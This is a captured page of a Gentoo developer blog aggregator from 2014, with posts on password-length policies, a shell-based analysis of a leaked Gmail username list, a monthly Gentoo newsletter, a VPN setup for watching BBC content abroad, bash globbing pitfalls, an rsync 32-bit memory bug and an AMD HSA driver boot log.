What happened is that the moment I tried to set up mail fetching in GMail, it kept failing authentication. And I was sure I used the right password that I had insisted on using up to that point! I could log in on the website just fine with it, so what gives? A quick check of the password that my browser (I think Firefox at the time) thought was the password for that website showed me the truth: the password I had been using to log in did not match the one I tried to use from GMail: the last character was not there. Some further inspection of the postal service website showed that the password fields, both on the password change and login pages (and, I assumed at the time, the registration page for obvious reasons), set a maxlength value of 10. So of course, as long as I typed or pasted the password in the field, the way I typed it when I registered, it worked perfectly fine, but when I tried to log in out of band (through POP3) it used the password as I intended, and failed.

A similar, more recent story happened with LastMinute. I went to change my password, in my recent spree of updating all my passwords, even for accounts not in use (mostly to make sure that they don't get leaked and allow people to do crazy stuff to me). My default password generator on LastPass is set to generate 32-characters passwords. But that did not work for LastMinute, or rather, it appeared to. It let me change my password just fine, but when I tried logging back in, well, it did not work. Yes, this is the reason that I try to log back in after generating the password, I've seen that happening before. In this case, the problem was to be found in the length of the password.

But just having a proper range for the password length wouldn't be enough. Other details that would be useful include, for instance, the allowed symbols; I have found that sometimes I need to either generate a number of passwords until I find one that does not contain any of the disallowed symbols but still has some, or give up on symbols altogether and ask LastPass to generate only letters and numbers. Or having a way to tell whether the password is case sensitive or not — because if it is not, what I do is disable the generation of one set of letters, so that it randomises them better.

But there is more metadata that could be of use there — things like which domains should the password be used with, for instance. Right now LastPass has a (limited) predefined list of equivalent domains, and hostnames that need to match exactly (so that bugs.gentoo.org and forums.gentoo.org are given different passwords), while it's up to you to build the rest of the database. Even for the Amazon domains, the list is not comprehensive and I had to add quite a few when logging in the Italian and UK stores.

Of course, if you were just to declare that your website uses the same password as, say, google.com, you're going to have a problem. What you need is a reciprocal indication that both sites consider the other equivalent, basically by serving the same identical file. This makes the implementation a bit more complex, but it should not be too difficult, as those kinds of sites tend to at least share robots.txt (okay, not in the case of Amazon), so distributing one more file should not be that difficult.
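
Purely as an illustration of what I have in mind (nothing like this is specified anywhere, and every key name below is made up), such a file could be as simple as:

# https://www.example.com/password-policy.txt (hypothetical)
min-length: 8
max-length: 255
case-sensitive: yes
allowed-symbols: !#$%&*+-_.@
equivalent-domains: example.com www.example.com shop.example.co.uk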

I'm not sure if anybody is going to work on implementing this, or writing a proper specification for it, rather than a vague rant on a blog, but hope can't die, right?

Sebastian Pipping a.k.a. sping (homepage, bugs)
My first cover on a printed book (September 13, 2014, 14:03 UTC)

A few days ago I had the chance to first get my hands on a printed version of that book I designed the cover for: Einführung in die Mittelspieltaktik des Xiangqi by Rainer Schmidt. The design was done using Inkscape and xiangqi-setup. I helped out with a few things on the inside too.

A few links on the actual book:

PS: Please note the cover images are “all rights reserved”.

Gentoo Haskell Herd a.k.a. haskell (homepage, bugs)
ghc 7.8.3 and rare architectures (September 13, 2014, 09:03 UTC)

After some initially positive experience with ghc-7.8-rc1 I’ve decided to upstream most of the Gentoo fixes.

On rare arches ghc-7.8.3 behaves a bit badly:

  • ia64 build stopped being able to link itself after ghc-7.4 (gprel overflow)
  • on sparc, ia64 and ppc ghc was not able to create working shared libraries
  • integer-gmp library on ia64 crashed, and we had to use integer-simple

I have written a small story of those fixes here if you are curious.

TL;DR:

To get ghc-7.8.3 working more nicely on exotic arches you will need to backport at least the following patches:

Thank you!


September 10, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
How to analyze a dump of usernames (September 10, 2014, 14:29 UTC)

There has been some noise around a leak of username/password pairs which somehow panicked people into thinking it was coming from a particular provider. Since it seems most people have not even tried looking at the account information available, I'd like to point out some ways that could have helped avoid the panic, if only the reporters had cared. It also fits nicely with my previous notes on accounts' churn.

But before proceeding let me make one thing straight: this post contains no information that is not available to the public and bears no relation to my daily work for my employer. Just wanted to make that clear. Edit: for the official response, please see this blog post of Google's Security blog.

To begin the analysis you need a copy of the list of usernames; Italian blogger Paolo Attivissimo linked to it in his post but I'm not going to do so. Especially since it's likely to become obsolete soon, and might not be liked by many. The archive is a compressed list of usernames without passwords or password hashes. At first, it seems to contain almost exclusively gmail.com addresses — in truth there are more addresses but it probably does not hit the news as much to say that there are some 5 million addresses from some thousand domains.

Let's first try to extract real email addresses from the file, which I'll call rawsource.txt — yes it does not match the name of the actual source file out there but I would rather avoid the search requests finding this post from the filename.

$ fgrep @ rawsource.txt > source-addresses.txt

This removes some two thousand lines that were not valid addresses — it turns out that the file actually contains some passwords, so let's process it a little more to get a bigger sample of valid addresses:

$ sed -i -e 's:|.*::' source-addresses.txt

This should make the next command give us a better estimate of the content:

$ sed -n -e 's:.*@::p' source-addresses.txt | sort | uniq -c | sort -n
[snip]
    238 gmail.com.au
    256 gmail.com.br
    338 gmail.com.vn
    608 gmail.com777
 123215 yandex.ru
4800129 gmail.com

So, as we were saying earlier, there are more than just Google accounts in this. A good chunk of them are on Yandex, but if you look at the outliers in the list there are plenty of other domains, including Yahoo. Let's just filter away the four thousand or so addresses using either broken domains or outlier domains and instead focus on these three providers:

$ egrep '@(gmail.com|yahoo.com|yandex.ru)$' source-addresses.txt > good-addresses.txt

Now things get more interesting, because to proceed to the next step you have to know how email servers and services work. For these three providers, and many default setups for postfix and similar, the local part of the address (everything before the @ sign) can contain a + sign; when that is found, the local part is split into user and extension, so that mail to nospam+noreally would be sent to the user nospam. Servers generally ignore the extension altogether, but you can use it to either register multiple accounts on the same mailbox (like I do for PayPal, IKEA, Sony, …) or to filter the received mail into different folders. I know some people who think they can absolutely identify the source of spam this way — I'm a bit more skeptical; if I were a spammer I would be dropping the extension altogether. Only some very die-hard Unix fans would refuse inbound email without an extension. Especially since I know plenty of services that don't accept email addresses with + in them.

Since this is not very well known, there are going to be very few email addresses using this feature, but that's still good because it limits the amount of data to crawl through. Finding a pattern within 5M addresses is going to take a while, finding one in 4k is much easier:

$ egrep '.*\+.*@.*' good-addresses.txt | sed -e '/.*@.*@.*/d' > experts-addresses.txt

The second command filters out some false positives due to two addresses being on the same line; the result from the source file I started with is 3964 addresses. Now we're talking. Let's extract the extensions from those good addresses:

$ sed -e 's:.*+\(.*\)@.*:\1:' experts-addresses.txt | sort > extensions.txt

The first obvious thing you can do is figure out if there are duplicates. While the individual extensions are probably interesting too, finding a pattern is easier if you have people using the same extension, especially since there aren't that many. So let's see which extensions are common:

$ sed -e 's:.*+\(.*\)@.*:\1:' experts-addresses.txt | sort | uniq -c -d | sort -n > common-extensions.txt

A quick look at that shows that a good chunk of the extensions used (see the last line in the generated file) were referencing xtube – which you may or may not know as a porn website – reminding me of the YouPorn-related leak two and a half years ago. Scouring through the list of extensions, it's also easy to spot the words "porn" and "porno", and even "nudeceleb", making the list probably quite up to date.

Just looking at the list of extensions shows a few patterns. Things like friendster, comicbookdb (and variants like comics, comicdb, …), and then daz (dazstudio), and mythtv. As RT points out it might very well be phishing attempts, but it is also quite possible that some of those smaller sites such as comicbookdb were breached and people just used the same passwords for their GMail address as for the services (I used to, too!), which is why I think mandatory registrations are evil.

The final automatic interesting discovery you can make involves checking for full domains in the extensions themselves:

$ fgrep . extensions.txt | sort -u

This will give you the extensions that include a dot in the name, many of which are actually proper site domains: xtube figures again, and so do comicbookdb, friendster, mythtvtalk, dax3d, s2games, policeauctions, itickets and many others.

What does this all tell me? I think what happened is that this list was compiled from breaches of different small websites that wouldn't make a headline (and that most likely did not report the breach to their users!), plus some general phishing. Lots of the passwords that have been confirmed as valid most likely come from people not using different passwords across websites. This breach is fixed like every other before it: stop using the same password across different websites, start using something like LastPass, and use two-factor authentication wherever possible.

September 08, 2014
Gentoo Monthly Newsletter: August 2014 (September 08, 2014, 21:20 UTC)

Gentoo News

Council News

Concerning the handling of bash-completion, and of phase functions in eclasses in general, the council decided to take no action. The former should be handled by the shell-tools team; the latter needs more discussion on the mailing lists.

Then we had two hot topics. The first was the games team policy; the council clarified that the games team has in no way authority over game ebuilds maintained by other developers. In addition, the games team should elect a lead in the near future. If it doesn't, it will be considered dysfunctional. Tim Harder (radhermit) acts as interim lead and organizes the elections.

Next, rumors about the handling of dynamic dependencies in Portage had sparked quite a stir. The council basically asks the Portage team not to remove dynamic dependency handling before they have worked out and presented a good plan for how Gentoo would work without it. Portage tree policies and the handling of eclasses and virtuals in particular need to be clarified.

Finally the list of planned features for EAPI 6 was amended by two items, namely additional options for configure and a non-runtime switchable ||= () or-dependency.

Gentoo Developer Moves

Summary

Gentoo is made up of 242 active developers, of which 43 are currently away.
Gentoo has recruited a total of 803 developers since its inception.

Changes

  • Ian Stakenvicius (axs) joined the multilib project
  • Michał Górny (mgorny) joined the QA team
  • Kristian Fiskerstrand (k_f) joined the Security team
  • Richard Freeman (rich0) joined the systemd team
  • Pavlos Ratis (dastergon) joined the Gentoo Infrastructure team
  • Patrice Clement (monsieur) and Ian Stakenvicius (axs) joined the perl team
  • Chris Reffett (creffett) joined the Wiki team
  • Pavlos Ratis (dastergon) left the KDE project
  • Dirkjan Ochtman (djc) left the ComRel project

Portage

This section summarizes the current state of the portage tree.

Architectures 45
Categories 162
Packages 17653
Ebuilds 37397
Architecture Stable Testing Total % of Packages
alpha 3661 574 4235 23.99%
amd64 10895 6263 17158 97.20%
amd64-fbsd 0 1573 1573 8.91%
arm 2692 1755 4447 25.19%
arm64 570 32 602 3.41%
hppa 3073 496 3569 20.22%
ia64 3196 626 3822 21.65%
m68k 614 98 712 4.03%
mips 0 2410 2410 13.65%
ppc 6841 2475 9316 52.77%
ppc64 4332 971 5303 30.04%
s390 1464 349 1813 10.27%
sh 1650 427 2077 11.77%
sparc 4135 922 5057 28.65%
sparc-fbsd 0 317 317 1.80%
x86 11572 5297 16869 95.56%
x86-fbsd 0 3241 3241 18.36%

gmn-portage-stats-2014-09

Security

The following GLSAs have been released by the Security Team

GLSA Package Description Bug
201408-19 app-office/openoffice-bin (and 3 more) OpenOffice, LibreOffice: Multiple vulnerabilities 283370
201408-18 net-analyzer/nrpe NRPE: Multiple Vulnerabilities 397603
201408-17 app-emulation/qemu QEMU: Multiple vulnerabilities 486352
201408-16 www-client/chromium Chromium: Multiple vulnerabilities 504328
201408-15 dev-db/postgresql-server PostgreSQL: Multiple vulnerabilities 456080
201408-14 net-misc/stunnel stunnel: Information disclosure 503506
201408-13 dev-python/jinja Jinja2: Multiple vulnerabilities 497690
201408-12 www-servers/apache Apache HTTP Server: Multiple vulnerabilities 504990
201408-11 dev-lang/php PHP: Multiple vulnerabilities 459904
201408-10 dev-libs/libgcrypt Libgcrypt: Side-channel attack 519396
201408-09 dev-libs/libtasn1 GNU Libtasn1: Multiple vulnerabilities 511536
201408-08 sys-apps/file file: Denial of Service 505534
201408-07 media-libs/libmodplug ModPlug XMMS Plugin: Multiple vulnerabilities 480388
201408-06 media-libs/libpng libpng: Multiple vulnerabilities 503014
201408-05 www-plugins/adobe-flash Adobe Flash Player: Multiple vulnerabilities 519790
201408-04 dev-util/catfish Catfish: Multiple Vulnerabilities 502536
201408-03 net-libs/libssh LibSSH: Information disclosure 503504
201408-02 media-libs/freetype FreeType: Arbitrary code execution 504088
201408-01 dev-php/ZendFramework Zend Framework: SQL injection 369139

Package Removals/Additions

Removals

Package Developer Date
virtual/perl-Class-ISA dilfridge 02 Aug 2014
virtual/perl-Filter dilfridge 02 Aug 2014
dev-vcs/gitosis robbat2 04 Aug 2014
dev-vcs/gitosis-gentoo robbat2 04 Aug 2014
virtual/python-argparse mgorny 11 Aug 2014
virtual/python-unittest2 mgorny 11 Aug 2014
app-emacs/sawfish ulm 19 Aug 2014
virtual/ruby-test-unit graaff 20 Aug 2014
games-action/d2x mr_bones_ 25 Aug 2014
games-arcade/koules mr_bones_ 25 Aug 2014
dev-lang/libcilkrts ottxor 26 Aug 2014

Additions

Package Developer Date
dev-python/oslotest prometheanfire 01 Aug 2014
dev-db/tokumx chainsaw 01 Aug 2014
sys-boot/gummiboot mgorny 02 Aug 2014
app-admin/supernova alunduil 03 Aug 2014
dev-db/mysql-cluster robbat2 03 Aug 2014
net-libs/txtorcon mrueg 04 Aug 2014
dev-ruby/prawn-table mrueg 06 Aug 2014
sys-apps/cv zx2c4 06 Aug 2014
media-libs/openctm amynka 07 Aug 2014
sci-libs/levmar amynka 07 Aug 2014
media-gfx/printrun amynka 07 Aug 2014
dev-python/alabaster idella4 10 Aug 2014
dev-haskell/regex-pcre slyfox 11 Aug 2014
dev-python/gcs-oauth2-boto-plugin vapier 12 Aug 2014
dev-python/astropy-helpers jlec 12 Aug 2014
dev-perl/Math-ModInt chainsaw 13 Aug 2014
dev-ruby/classifier-reborn mrueg 13 Aug 2014
media-gfx/meshlab amynka 14 Aug 2014
dev-libs/librevenge scarabeus 15 Aug 2014
www-apps/jekyll-coffeescript mrueg 15 Aug 2014
www-apps/jekyll-gist mrueg 15 Aug 2014
www-apps/jekyll-paginate mrueg 15 Aug 2014
www-apps/jekyll-watch mrueg 15 Aug 2014
sec-policy/selinux-salt swift 15 Aug 2014
www-apps/jekyll-sass-converter mrueg 15 Aug 2014
dev-ruby/rouge mrueg 15 Aug 2014
dev-ruby/ruby-beautify graaff 16 Aug 2014
sys-firmware/nvidia-firmware idl0r 17 Aug 2014
media-libs/libmpris2client ssuominen 20 Aug 2014
xfce-extra/xfdashboard ssuominen 20 Aug 2014
www-client/opera-developer jer 20 Aug 2014
dev-libs/openspecfun patrick 21 Aug 2014
dev-libs/marisa dlan 22 Aug 2014
media-sound/dcaenc beandog 22 Aug 2014
sci-mathematics/geogebra amynka 23 Aug 2014
dev-python/crumbs alunduil 25 Aug 2014
media-gfx/kxstitch kensington 26 Aug 2014
media-gfx/symboleditor kensington 26 Aug 2014
dev-perl/Sort-Key chainsaw 26 Aug 2014
dev-perl/Sort-Key-IPv4 chainsaw 26 Aug 2014
sci-visualization/yt xarthisius 26 Aug 2014
dev-ruby/globalid graaff 27 Aug 2014
dev-python/certifi idella4 27 Aug 2014
www-apps/jekyll-sitemap mrueg 27 Aug 2014
sys-apps/tuned dlan 29 Aug 2014
app-portage/g-sorcery jauhien 29 Aug 2014
app-portage/gs-elpa jauhien 29 Aug 2014
app-portage/gs-pypi jauhien 29 Aug 2014
app-admin/eselect-rust jauhien 29 Aug 2014
sys-block/raid-check chutzpah 29 Aug 2014
dev-python/python3-openid maksbotan 30 Aug 2014
dev-python/python-social-auth maksbotan 30 Aug 2014
dev-python/websocket-client alunduil 31 Aug 2014
dev-ruby/ethon graaff 31 Aug 2014

Bugzilla

The Gentoo community uses Bugzilla to record and track bugs, notifications, suggestions and other interactions with the development team.

Activity

The following tables and charts summarize the activity on Bugzilla between 01 August 2014 and 31 August 2014. Not fixed means bugs that were resolved as NEEDINFO, WONTFIX, CANTFIX, INVALID or UPSTREAM.
gmn-activity-2014-08

Bug Activity Number
New 1575
Closed 981
Not fixed 187
Duplicates 145
Total 6023
Blocker 5
Critical 19
Major 66

Closed bug ranking

The following table outlines the teams and developers with the most bugs resolved during this period

Rank Team/Developer Bug Count
1 Gentoo Security 102
2 Gentoo's Team for Core System packages 39
3 Gentoo KDE team 37
4 Default Assignee for Orphaned Packages 32
5 Julian Ospald (hasufell) 26
6 Gentoo Games 25
7 Portage team 25
8 Netmon Herd 24
9 Python Gentoo Team 23
10 Others 647

gmn-closed-2014-08

Assigned bug ranking

The developers and teams who have been assigned the most bugs during this period are as follows.

Rank Team/Developer Bug Count
1 Gentoo Linux bug wranglers 160
2 Gentoo Security 61
3 Default Assignee for Orphaned Packages 60
4 Gentoo KDE team 45
5 Gentoo's Team for Core System packages 45
6 Gentoo Linux Gnome Desktop Team 37
7 Gentoo Games 28
8 Portage team 28
9 Python Gentoo Team 26
10 Others 1084

gmn-opened-2014-08

Heard in the community

Send us your favorite Gentoo script or tip at gmn@gentoo.org

Getting Involved?

Interested in helping out? The GMN relies on volunteers and members of the community for content every month. If you are interested in writing for the GMN or thinking of another way to contribute, please send an e-mail to gmn@gentoo.org.

Comments or Suggestions?

Please head over to this forum post.

September 07, 2014
Jeremy Olexa a.k.a. darkside (homepage, bugs)
Bypassing Geolocation … (September 07, 2014, 00:42 UTC)

By now we all know that it is pretty easy to bypass geolocation blockage with a web proxy or VPN service. After all, there are over 2 million Google results for “bbc vpn” … and I wanted to do just that to view a BBC show on privacy and the dark web.

I wanted to set this up as cheaply as possible but not use a service that I had to pay for a month since I only needed one hour. This requirement directed me towards a do-it-yourself solution with an hourly server in the UK. I also wanted reproducibility so that I could spin up a similar service again in the future.

My first attempt was to route my browser through a local SOCKS proxy via ssh tunneling, ssh -D 2001 user@uk-host.tld. That didn’t work because my home connection was not good enough to stream from BBC without incessant buffering.

Hmm, if this simple proxy won’t work then that rules out many other ideas; I needed a way to use the BBC iPlayer Downloader to view content offline. Ok, but the software doesn’t have native proxy support (naturally). Maybe you could somehow use Tor and set the exit node to the UK? That seems like a poor/slow idea.

I ended up routing all my traffic through a personal OpenVPN server in London and then downloaded the show via the BBC software and watched it in HD offline. The goal was to provision the VPN as quickly as possible (time is money). A StackScript is a feature that Linode offers: a user-defined script run at the first boot of your host. Surprisingly, no one had published one to install OpenVPN yet. So I did: “Debian 7.5 OpenVPN” – feel free to use it on the Linode service to boot up a VPN automatically. It takes about two minutes to boot, install, and configure OpenVPN this way. Then you download the ca.crt and client configuration from the newly provisioned server and import them into your client.

End result: It took 42 minutes for me to download a one hour show. Since I shut down the VPN within an hour, I was charged the Linode minimum, $.015 USD. Though I recommend Linode (you can use my referral link if you want), this same concept applies to any provider that has a presence in the UK, like Digital Ocean who charges $.007/hour.

Addendum: Even though I abandoned my first attempt, I left the browser window open and it continued to download even after I was disconnected from my UK VPN. I guess BBC only checks your IP once then hands you off to the Akamai CDN. Maybe you only need a VPN service for a few minutes?

I also donated money to a BBC-sponsored charity to offset some of my bandwidth usage and freeloading of a service that UK citizens have to pay for; I encourage you to do the same. For reference, the BBC costs a UK household about $.02 USD in tax per hour. (source)

September 05, 2014


Fig. 1: Iron Penguin

Gentoo Linux is proud to announce the availability of a new LiveDVD to celebrate the continued collaboration between Gentoo users and developers. The LiveDVD features a superb list of packages, some of which are listed below.

A special thanks to the Gentoo Infrastructure Team and likewhoa. Their hard work behind the scenes provides the resources, services and technology necessary to support the Gentoo Linux project.

  • Packages included in this release: Linux Kernel 3.15.6, Xorg 1.16.0, KDE 4.13.3, Gnome 3.12.2, XFCE 4.10, Fluxbox 1.3.5, LXQT Desktop 0.7.0, i3 Desktop 2.8, Firefox 31.0, LibreOffice 4.2.5.2, Gimp 2.8.10-r1, Blender 2.71-r1, Amarok 2.8.0-r2, Chromium 37.0.2062.35 and much more ...
  • If you want to see if your package is included we have generated both the x86 package list and the amd64 package list. The FAQ is located at FAQ. DVD cases and covers for the 20140826 release are located at Artwork. Persistence mode is back in the 20140826 release!

The LiveDVD is available in two flavors: a hybrid x86/x86_64 version, and an x86_64 multilib version. The livedvd-x86-amd64-32ul-20140826 version will work on 32-bit x86 or 64-bit x86_64. If your CPU architecture is x86, then boot with the default gentoo kernel. If your arch is amd64, boot with the gentoo64 kernel. This means you can boot a 64-bit kernel and install a customized 64-bit userland while using the provided 32-bit userland. The livedvd-amd64-multilib-20140826 version is for x86_64 only.

If you are ready to check it out, let our bouncer direct you to the closest x86 image or amd64 image file.

If you need support or have any questions, please visit the discussion thread on our forum.

Thank you for your continued support,
Gentoo Linux Developers, the Gentoo Foundation, and the Gentoo-Ten Project.

Michał Górny a.k.a. mgorny (homepage, bugs)
Bash pitfalls: globbing everywhere! (September 05, 2014, 08:31 UTC)

Bash has many subtle pitfalls, some of them able to live unnoticed for a very long time. A common example of that kind of pitfall is ubiquitous filename expansion, or globbing. What many script writers fail to notice is that practically anything that looks like a pattern and is not quoted is subject to globbing, including unquoted variables.

There are two extra snags that add to this. Firstly, many people forget that not only asterisks (*) and question marks (?) make up patterns — square brackets ([) do as well. Secondly, by default bash (and POSIX shell) takes failed expansions literally. That is, if your glob does not match any file, you may not even know that you are globbing.

It's all just a matter of running in the proper directory for the result to change. Of course, it's often unlikely — maybe even close to impossible. You can work towards preventing that by running in a safe directory. But in the end, writing predictable software is a fine quality.

How to notice mistakes?

Bash provides two major facilities that can help you catch such mistakes — the nullglob and failglob shell options (shopt).

The nullglob option is a good default choice for your script. After enabling it, a failing filename expansion results in no parameters rather than the verbatim pattern itself. This has two important implications.

Firstly, it makes iterating over optional files easy:

for f in a/* b/* c/*; do
    some_magic "${f}"
done

Without nullglob, the above may actually return a/* if no file matches that pattern. For this reason, you would need to add an additional check for the existence of the file inside the loop. With nullglob, it will just ‘omit’ the unmatched arguments. In fact, if none of the patterns match, the loop won't be run even once.

Secondly, it turns every accidental glob into null. While this isn't the most friendly warning and in fact it may have very undesired results, you're more likely to notice that something is going wrong.

The failglob option is better if you can assume you don't need to match files in its scope. In this case, bash treats every failing filename expansion as a fatal error and terminates execution with an appropriate message.

The main advantage of failglob is that it makes you aware of the mistake before someone hits it the hard way. That is, of course, assuming that the stray pattern doesn't accidentally expand to something already.

There is also a choice of noglob. However, I wouldn't recommend it since it works around mistakes rather than fixing them, and makes the code rely on a non-standard environment.

Word splitting without globbing

One of the pitfalls I noticed myself falling into lately is the attempt to use unquoted variable substitution to do word splitting. For example:

for i in ${v}; do
    echo "${i}"
done

At a first glance, everything looks fine. ${v} contains a whitespace-separated list of words and we iterate over each word. The pitfall here is that words in ${v} are subject to filename expansion. For example, if a lone asterisk would happen to be there (like v='10 * 4'), you'd actually get all files in the current directory. Unexpected, isn't it?

I am aware of three solutions that can be used to accomplish word splitting without implicit globbing:

  1. setting shopt -s noglob locally,
  2. setting GLOBIGNORE='*' locally,
  3. using the swiss army knife of read to perform word splitting.

Personally, I dislike the first two since they require set-and-restore magic, and the second one also has the penalty of performing the globbing and then discarding the result. Therefore, I will expand on using read:

read -r -d '' -a words <<<"${v}"
for i in "${words[@]}"; do
    echo "${i}"
done

While normally read is used to read from files, we can use the here string syntax of bash to feed the variable into it. The -r option disables backslash escape processing that is undesired here. -d '' causes read to process the whole input and not stop at any delimiter (like newline). -a words causes it to put the split words into array ${words[@]} — and since we know how to safely iterate over an array, the underlying issue is solved.

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
32bit Madness (September 05, 2014, 06:41 UTC)

This week I ran into a funny issue doing backups with rsync:

rsnapshot/weekly.3/server/storage/lost/of/subdirectories/some-stupid.file => rsnapshot/daily.0/server/storage/lost/of/subdirectories/some-stupid.file
ERROR: out of memory in make_file [generator]
rsync error: error allocating core memory buffers (code 22) at util.c(117) [generator=3.0.9]
rsync error: received SIGUSR1 (code 19) at main.c(1298) [receiver=3.0.9]
rsync: connection unexpectedly closed (2168136360 bytes received so far) [sender]
rsync error: error allocating core memory buffers (code 22) at io.c(605) [sender=3.0.9]
Oopsiedaisy, rsync ran out of memory. But ... this machine has 8GB RAM, plus 32GB Swap ?!
So I re-ran this and started observing, and BAM, it fails again. With ~4GB RAM free.

4GB you say, eh? That smells of ... 2^32 ...
For doing the copying I was using sysrescuecd, and then it became obvious to me: All binaries are of course 32bit!

So now I'm doing a horrible hack of "linux64 chroot /mnt/server" so that I have a 64bit environment that does not run out of space randomly. Plus 3 new bugs for the Gentoo livecd, which fails to appreciate USB and other things.
Who would have thought that a 16TB partition can make rsync stumble over address space limits ...

September 03, 2014
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
AMD HSA (September 03, 2014, 06:25 UTC)

With the release of the "Kaveri" APUs AMD has released some quite intriguing technology. The idea of the "APU" is a blend of CPU and GPU, what AMD calls "HSA" - Heterogeneous System Architecture.
What does this mean for us? In theory, once software catches up, it'll be a lot easier to use GPU-acceleration (e.g. OpenCL) within normal applications.

One big advantage seems to be that CPU and GPU share the system memory, so with the right drivers you should be able to do zero-copy GPU processing. No more host-to-GPU copy and other waste of time.

So far there hasn't been any driver support to take advantage of that. Here's the good news: As of a week or two ago there is driver support. Still very alpha, but ... at last, drivers!

On the kernel side there's the kfd driver, which piggybacks on radeon. It's available in a slightly very patched kernel from AMD. During bootup it looks like this:

[    1.651992] [drm] radeon kernel modesetting enabled.
[    1.657248] kfd kfd: Initialized module
[    1.657254] Found CRAT image with size=1440
[    1.657257] Parsing CRAT table with 1 nodes
[    1.657258] Found CU entry in CRAT table with proximity_domain=0 caps=0
[    1.657260] CU CPU: cores=4 id_base=16
[    1.657261] Found CU entry in CRAT table with proximity_domain=0 caps=0
[    1.657262] CU GPU: simds=32 id_base=-2147483648
[    1.657263] Found memory entry in CRAT table with proximity_domain=0
[    1.657264] Found memory entry in CRAT table with proximity_domain=0
[    1.657265] Found memory entry in CRAT table with proximity_domain=0
[    1.657266] Found memory entry in CRAT table with proximity_domain=0
[    1.657267] Found cache entry in CRAT table with processor_id=16
[    1.657268] Found cache entry in CRAT table with processor_id=16
[    1.657269] Found cache entry in CRAT table with processor_id=16
[    1.657270] Found cache entry in CRAT table with processor_id=17
[    1.657271] Found cache entry in CRAT table with processor_id=18
[    1.657272] Found cache entry in CRAT table with processor_id=18
[    1.657273] Found cache entry in CRAT table with processor_id=18
[    1.657274] Found cache entry in CRAT table with processor_id=19
[    1.657274] Found TLB entry in CRAT table (not processing)
[    1.657275] Found TLB entry in CRAT table (not processing)
[    1.657276] Found TLB entry in CRAT table (not processing)
[    1.657276] Found TLB entry in CRAT table (not processing)
[    1.657277] Found TLB entry in CRAT table (not processing)
[    1.657278] Found TLB entry in CRAT table (not processing)
[    1.657278] Found TLB entry in CRAT table (not processing)
[    1.657279] Found TLB entry in CRAT table (not processing)
[    1.657279] Found TLB entry in CRAT table (not processing)
[    1.657280] Found TLB entry in CRAT table (not processing)
[    1.657286] Creating topology SYSFS entries
[    1.657316] Finished initializing topology ret=0
[    1.663173] [drm] initializing kernel modesetting (KAVERI 0x1002:0x1313 0x1002:0x0123).
[    1.663204] [drm] register mmio base: 0xFEB00000
[    1.663206] [drm] register mmio size: 262144
[    1.663210] [drm] doorbell mmio base: 0xD0000000
[    1.663211] [drm] doorbell mmio size: 8388608
[    1.663280] ATOM BIOS: 113
[    1.663357] radeon 0000:00:01.0: VRAM: 1024M 0x0000000000000000 - 0x000000003FFFFFFF (1024M used)
[    1.663359] radeon 0000:00:01.0: GTT: 1024M 0x0000000040000000 - 0x000000007FFFFFFF
[    1.663360] [drm] Detected VRAM RAM=1024M, BAR=256M
[    1.663361] [drm] RAM width 128bits DDR
[    1.663471] [TTM] Zone  kernel: Available graphics memory: 7671900 kiB
[    1.663472] [TTM] Zone   dma32: Available graphics memory: 2097152 kiB
[    1.663473] [TTM] Initializing pool allocator
[    1.663477] [TTM] Initializing DMA pool allocator
[    1.663496] [drm] radeon: 1024M of VRAM memory ready
[    1.663497] [drm] radeon: 1024M of GTT memory ready.
[    1.663516] [drm] Loading KAVERI Microcode
[    1.667303] [drm] Internal thermal controller without fan control
[    1.668401] [drm] radeon: dpm initialized
[    1.669403] [drm] GART: num cpu pages 262144, num gpu pages 262144
[    1.685757] [drm] PCIE GART of 1024M enabled (table at 0x0000000000277000).
[    1.685894] radeon 0000:00:01.0: WB enabled
[    1.685905] radeon 0000:00:01.0: fence driver on ring 0 use gpu addr 0x0000000040000c00 and cpu addr 0xffff880429c5bc00
[    1.685908] radeon 0000:00:01.0: fence driver on ring 1 use gpu addr 0x0000000040000c04 and cpu addr 0xffff880429c5bc04
[    1.685910] radeon 0000:00:01.0: fence driver on ring 2 use gpu addr 0x0000000040000c08 and cpu addr 0xffff880429c5bc08
[    1.685912] radeon 0000:00:01.0: fence driver on ring 3 use gpu addr 0x0000000040000c0c and cpu addr 0xffff880429c5bc0c
[    1.685914] radeon 0000:00:01.0: fence driver on ring 4 use gpu addr 0x0000000040000c10 and cpu addr 0xffff880429c5bc10
[    1.686373] radeon 0000:00:01.0: fence driver on ring 5 use gpu addr 0x0000000000076c98 and cpu addr 0xffffc90012236c98
[    1.686375] [drm] Supports vblank timestamp caching Rev 2 (21.10.2013).
[    1.686376] [drm] Driver supports precise vblank timestamp query.
[    1.686406] radeon 0000:00:01.0: irq 83 for MSI/MSI-X
[    1.686418] radeon 0000:00:01.0: radeon: using MSI.
[    1.686441] [drm] radeon: irq initialized.
[    1.689611] [drm] ring test on 0 succeeded in 3 usecs
[    1.689699] [drm] ring test on 1 succeeded in 2 usecs
[    1.689712] [drm] ring test on 2 succeeded in 2 usecs
[    1.689849] [drm] ring test on 3 succeeded in 2 usecs
[    1.689856] [drm] ring test on 4 succeeded in 2 usecs
[    1.711523] tsc: Refined TSC clocksource calibration: 3393.828 MHz
[    1.746010] [drm] ring test on 5 succeeded in 1 usecs
[    1.766115] [drm] UVD initialized successfully.
[    1.767829] [drm] ib test on ring 0 succeeded in 0 usecs
[    2.268252] [drm] ib test on ring 1 succeeded in 0 usecs
[    2.712891] Switched to clocksource tsc
[    2.768698] [drm] ib test on ring 2 succeeded in 0 usecs
[    2.768819] [drm] ib test on ring 3 succeeded in 0 usecs
[    2.768870] [drm] ib test on ring 4 succeeded in 0 usecs
[    2.791599] [drm] ib test on ring 5 succeeded
[    2.812675] [drm] Radeon Display Connectors
[    2.812677] [drm] Connector 0:
[    2.812679] [drm]   DVI-D-1
[    2.812680] [drm]   HPD3
[    2.812682] [drm]   DDC: 0x6550 0x6550 0x6554 0x6554 0x6558 0x6558 0x655c 0x655c
[    2.812683] [drm]   Encoders:
[    2.812684] [drm]     DFP2: INTERNAL_UNIPHY2
[    2.812685] [drm] Connector 1:
[    2.812686] [drm]   HDMI-A-1
[    2.812687] [drm]   HPD1
[    2.812688] [drm]   DDC: 0x6530 0x6530 0x6534 0x6534 0x6538 0x6538 0x653c 0x653c
[    2.812689] [drm]   Encoders:
[    2.812690] [drm]     DFP1: INTERNAL_UNIPHY
[    2.812691] [drm] Connector 2:
[    2.812692] [drm]   VGA-1
[    2.812693] [drm]   HPD2
